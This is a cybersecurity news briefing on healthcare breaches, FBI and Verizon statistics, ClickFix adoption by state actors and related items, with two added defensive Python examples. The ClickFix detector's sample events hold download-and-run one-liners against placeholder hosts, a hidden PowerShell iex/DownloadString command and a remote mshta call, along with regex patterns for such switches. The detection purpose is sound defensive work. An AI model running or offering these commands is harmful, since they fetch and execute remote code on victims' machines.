At a glance.
- Healthcare data breaches affect millions.
- Victims lost $16.6 billion to cybercrime in 2024.
- Verizon's DBIR finds that third-party breaches have doubled.
- State-sponsored groups adopt ClickFix technique for malware delivery.
- Russian state-backed hackers target Dutch critical infrastructure.
Healthcare data breaches affect millions.
Blue Shield of California has disclosed a data breach after it mistakenly exposed health information of 4.7 million people to Google's analytics and advertisement platforms, the Register reports. The health insurance provider said the breach was caused by a misconfiguration of Google Analytics on some of its websites. Blue Shield stated, "On February 11, 2025, Blue Shield discovered that, between April 2021 and January 2024, Google Analytics was configured in a way that allowed certain member data to be shared with Google’s advertising product, Google Ads, that likely included protected health information. Google may have used this data to conduct focused ad campaigns back to those individual members. We want to reassure our members that no bad actor was involved, and, to our knowledge, Google has not used the information for any purpose other than these ads or shared the protected information with anyone."
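The disclosure above does not say which Google Analytics setting was wrong, only that member data reached Google Ads. The check a privacy or security engineer would want regardless is an audit of the analytics beacons a site actually sends. The following is an added example, not Blue Shield's or Google's code: it parses constructed GA4-style `collect` requests (the parameter names `v`, `tid`, `cid`, `dl`, `en`, `ep.*` and `up.*` are real Measurement Protocol fields; every value is made up) and flags page URLs, event parameters and user properties that carry PHI-like data, then strips them. The PHI patterns and the list of sensitive keys are assumptions chosen for the demonstration.

```python
"""Audit and scrub analytics beacons for PHI-like values (added example, constructed data)."""
import re
from urllib.parse import parse_qs, urlencode, urlparse, urlunparse

# Value patterns treated as PHI indicators (assumed for the demo, not a HIPAA definition)
PHI_PATTERNS = {
    "email": re.compile(r"[\w.+-]+@[\w-]+\.[\w.]+"),
    "ssn": re.compile(r"\b\d{3}-\d{2}-\d{4}\b"),
    "date_of_birth": re.compile(r"\b(19|20)\d{2}-\d{2}-\d{2}\b"),
    "phone": re.compile(r"\b\d{3}[-.]\d{3}[-.]\d{4}\b"),
}
# Parameter names (in the beacon or in the page URL it reports) that identify a member or a diagnosis
SENSITIVE_KEYS = {"member_id", "mrn", "diagnosis", "condition", "claim_id", "dob", "ssn"}


def _scan_value(key, value):
    """Findings for one parameter: (key, kind, value). ep.x / up.x / dl.x reduce to their last segment."""
    findings = []
    bare = key.rsplit(".", 1)[-1].lower()
    if bare in SENSITIVE_KEYS and value:
        findings.append((key, "sensitive_key", value))
    for kind, rx in PHI_PATTERNS.items():
        if rx.search(value):
            findings.append((key, kind, value))
    return findings


def inspect_beacon(url):
    """Return every PHI-like finding in a collect request, including the page URL's own query string."""
    findings = []
    for key, values in parse_qs(urlparse(url).query, keep_blank_values=True).items():
        for value in values:
            findings.extend(_scan_value(key, value))
            if key == "dl":  # document location: the visited page URL is forwarded too
                page_query = parse_qs(urlparse(value).query, keep_blank_values=True)
                for pkey, pvalues in page_query.items():
                    for pv in pvalues:
                        findings.extend(_scan_value("dl." + pkey, pv))
    return findings


def _strip_page_query(page_url):
    page = urlparse(page_url)
    kept = {k: v for k, v in parse_qs(page.query, keep_blank_values=True).items()
            if not any(_scan_value("dl." + k, x) for x in v)}
    return urlunparse(page._replace(query=urlencode(kept, doseq=True)))


def scrub_beacon(url):
    """Drop flagged parameters and remove sensitive keys from the reported page URL."""
    parts = urlparse(url)
    clean = {}
    for key, values in parse_qs(parts.query, keep_blank_values=True).items():
        if key == "dl":
            clean[key] = [_strip_page_query(v) for v in values]
        else:
            safe = [v for v in values if not _scan_value(key, v)]
            if safe:
                clean[key] = safe
    return urlunparse(parts._replace(query=urlencode(clean, doseq=True)))


# Constructed beacons: placeholder property id, invalid-TLD hostnames, fictional member data
COLLECT = "https://www.google-analytics.com/g/collect?"
CLEAN_BEACON = COLLECT + urlencode({
    "v": "2", "tid": "G-PLACEHOLDER", "cid": "123.456", "en": "page_view",
    "dl": "https://member.example.invalid/plans/compare",
})
LEAKY_BEACON = COLLECT + urlencode({
    "v": "2", "tid": "G-PLACEHOLDER", "cid": "123.456", "en": "page_view",
    "dl": "https://member.example.invalid/claims?member_id=88123&condition=diabetes",
    "ep.email": "jane.doe@example.invalid",   # event parameter forwarded to Google
    "up.dob": "1984-07-19",                   # user property forwarded to Google
})

if __name__ == "__main__":
    for name, beacon in (("clean", CLEAN_BEACON), ("leaky", LEAKY_BEACON)):
        print(name, inspect_beacon(beacon))
    print("scrubbed:", scrub_beacon(LEAKY_BEACON))
```

Run this over beacons captured from a browser's network log or a proxy during a test session of the site; anything `inspect_beacon` flags is data that would have reached the advertising product, whatever the tag configuration says. Scrubbing at the beacon is a last line of defence; the fix belongs in the tag configuration and in keeping identifiers out of page URLs in the first place.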
The Yale New Haven Health System (YNHHS) in Connecticut has disclosed a data breach it sustained last month that impacted 5.5 million patients, SecurityWeek reports. YNHHS hasn't disclosed the nature of the attack, but said an "unauthorized third-party gained access to our network" and obtained copies of data. The health system stated, "The information involved varies by patient, but may include demographic information (such as name, date of birth, address, telephone number, email address, race or ethnicity), Social Security number, patient type, and/or medical record number. YNHHS’ electronic medical record system was not involved nor accessed in this incident, and no financial accounts, payment information, or employee HR information was included."
BleepingComputer reports that a ransomware-related data breach at Frederick Health Medical Group in Maryland affected information belonging to nearly one million patients. Frederick Health said in a breach notification last month that the stolen information "varied by individual but may have contained patient names, addresses, dates of birth, Social Security numbers, drivers’ license numbers, medical record numbers, health insurance information, and/or clinical information related to patients’ care." BleepingComputer notes that no ransomware group has claimed credit or posted data from this attack, suggesting Frederick Health may have paid the ransom.
The Record has a roundup of additional healthcare-related breaches disclosed over the past week, including notifications from Onsite Mammography, Kelly & Associates Insurance Group, Behavioral Health Resources, Hamilton Health Care System, Central Texas Pediatric Orthopedics, and Medical Express Ambulance Service.
Victims lost $16.6 billion to cybercrime in 2024.
The US FBI's Internet Crime Complaint Center (IC3) has released its annual report for 2024, finding that reported losses to cybercrime last year reached a record $16.6 billion. The most costly attacks were investment scams, causing $6.5 billion in losses, followed by business email compromise (BEC) at $2.7 billion and tech support scams at $1.4 billion.
The FBI received more than 4,800 complaints from critical infrastructure entities last year, most of which involved ransomware and/or data breaches. These reports rose by 9 percent compared to 2023.
Verizon's DBIR finds that third-party breaches have doubled.
Verizon has released its 2025 Data Breach Investigations Report (DBIR), finding that the percentage of breaches involving a third party has doubled to 30% compared to last year's report. Most of these incidents involved system intrusion, which Verizon says "encapsulates all the breaches and incidents that leverage a diversity of techniques, predominantly hacking techniques and malware, with a dash of social engineering."
Additionally, exploitation of vulnerabilities for initial access grew by 34% and now accounts for 20% of breaches. The researchers say this increase was partly driven by exploitation of zero-days affecting edge devices and VPNs, noting, "The percentage of edge devices and VPNs as a target on our exploitation of vulnerabilities action was 22%, and it grew almost eight-fold from the 3% found in last year’s report."
The presence of ransomware also increased by 37%, despite a decrease in the median ransom payout from $150,000 to $115,000.
State-sponsored groups adopt ClickFix technique for malware delivery.
Proofpoint says state-sponsored actors from North Korea, Iran, and Russia have adopted the ClickFix social engineering tactic to deliver malware. ClickFix involves tricking a user into copying and pasting a malicious command into a terminal on their machine. Proofpoint notes, "This creative technique not only employs fake error messages as the problem, but also an authoritative alert and instructions supposedly coming from the operating system as a solution. Primarily observed in cybercrime activity, the ClickFix technique was first seen in early March 2024 deployed by initial access broker TA571 and the ClearFake cluster, after which it flooded the threat landscape."
The researchers observed the technique used in espionage campaigns by North Korea's Kimsuky, Iran's MuddyWater, and the Russian threat actors APT28 and UNK_RemoteRogue.
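Because ClickFix relies on the victim pasting the command themselves, the process that results on Windows is a script or command host launched straight from explorer.exe (Run dialog, Start menu) rather than from a browser, an Office application or a scheduled task, and the pasted one-liner usually carries hidden-window, policy-bypass or download-and-run switches. The following is an added example, not Proofpoint's code: a small scorer over hand-built Sysmon Event ID 1 style process-creation records (the paths, user, command lines and placeholder URLs are constructed; the trait list, weights and threshold are assumptions for the demonstration).

```python
"""Flag ClickFix-style executions in Windows process-creation telemetry (added example, constructed events)."""
import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    image: str           # full path of the new process
    parent_image: str    # full path of the parent process
    command_line: str
    user: str = "CORP\\jdoe"   # constructed


# Script/command hosts a pasted ClickFix command ends up in
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe", "cscript.exe"}
# A child of explorer.exe means the user launched it by hand (Run dialog, Start menu)
USER_LAUNCHERS = {"explorer.exe"}

# Command-line traits (switches and cmdlet names, not payloads) typical of pasted commands
TRAITS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+h(?:idden)?\b"),
    "encoded_command": re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}"),
    "policy_bypass": re.compile(r"(?i)-e(?:xecution)?p(?:olicy)?\s+bypass"),
    "download_and_run": re.compile(r"(?i)\b(iex|invoke-expression|downloadstring|invoke-webrequest|irm|iwr)\b"),
    "remote_hta": re.compile(r"(?i)mshta(?:\.exe)?\s+[\"']?https?://"),
}


def _basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def score_event(ev):
    """Return (score, reasons); the explorer.exe parent and each matched trait add one point."""
    if _basename(ev.image) not in INTERPRETERS:
        return 0, []
    reasons = []
    if _basename(ev.parent_image) in USER_LAUNCHERS:
        reasons.append("interpreter launched directly from explorer.exe")
    reasons += [name for name, rx in TRAITS.items() if rx.search(ev.command_line)]
    return len(reasons), reasons


def find_clickfix_candidates(events, threshold=2):
    """Events scoring at least `threshold` (assumed cutoff) are worth an analyst's look."""
    hits = []
    for ev in events:
        score, reasons = score_event(ev)
        if score >= threshold:
            hits.append((ev, score, reasons))
    return hits


SAMPLE_EVENTS = [
    # 1. Run-dialog PowerShell one-liner of the kind a fake-error lure asks for (placeholder URL)
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
                 "powershell.exe -w hidden -ep bypass -c \"iex ((New-Object Net.WebClient)"
                 ".DownloadString('https://captcha-fix.example.invalid/'))\""),
    # 2. mshta variant fetching a remote HTA (placeholder URL)
    ProcessEvent(r"C:\Windows\System32\mshta.exe", r"C:\Windows\explorer.exe",
                 "mshta.exe https://verify.example.invalid/check.hta"),
    # 3. Benign: integrated terminal spawned by an editor
    ProcessEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"C:\Program Files\Editor\editor.exe", "powershell.exe -NoLogo -NoExit"),
    # 4. Benign: user runs a diagnostic from the Run box
    ProcessEvent(r"C:\Windows\System32\cmd.exe", r"C:\Windows\explorer.exe", "cmd.exe /c ipconfig /all"),
    # 5. Not an interpreter at all
    ProcessEvent(r"C:\Windows\System32\notepad.exe", r"C:\Windows\explorer.exe", "notepad.exe"),
]

if __name__ == "__main__":
    for ev, score, reasons in find_clickfix_candidates(SAMPLE_EVENTS):
        print(score, _basename(ev.image), reasons)
```

A hit is corroborated on the host by the Run dialog's history under `HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU`, which records what the user pasted, and by the browser history immediately before the event, which shows the lure page. The explorer.exe-parent condition is deliberately only one point, since users legitimately run commands from the Run box; it is the combination with the pasted command's switches that separates the lure from ordinary use.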
Russian state-backed hackers target Dutch critical infrastructure.
The Dutch Military Intelligence and Security Service (MIVD) warns that Russian state-sponsored threat actors have begun targeting critical infrastructure in the Netherlands, the Record reports. The MIVD says Russian hackers attempted to sabotage the "digital operating system of a public facility in the Netherlands" last year. Although the incident did not cause any damage, the MIVD notes that this was "the first time that a group like this has carried out a cyber sabotage attack against such a control system in the Netherlands."
Crime and punishment.
The US Justice Department has charged an Iranian national, Behrouz Parsarad, for his alleged role as founder and operator of the popular darknet souk Nemesis Market. The Nemesis Market, which was shuttered by German police last year, had more than 150,000 users and processed more than 400,000 orders for illegal drugs. The marketplace also served various cybercriminal goods, including "stolen financial information, fraudulent identification documents, counterfeit currencies, and computer malware."
The US Treasury Department said last month that Nemesis facilitated the sale of nearly $30 million worth of drugs during its three years of operation, with Parsarad taking a five percent cut of each sale.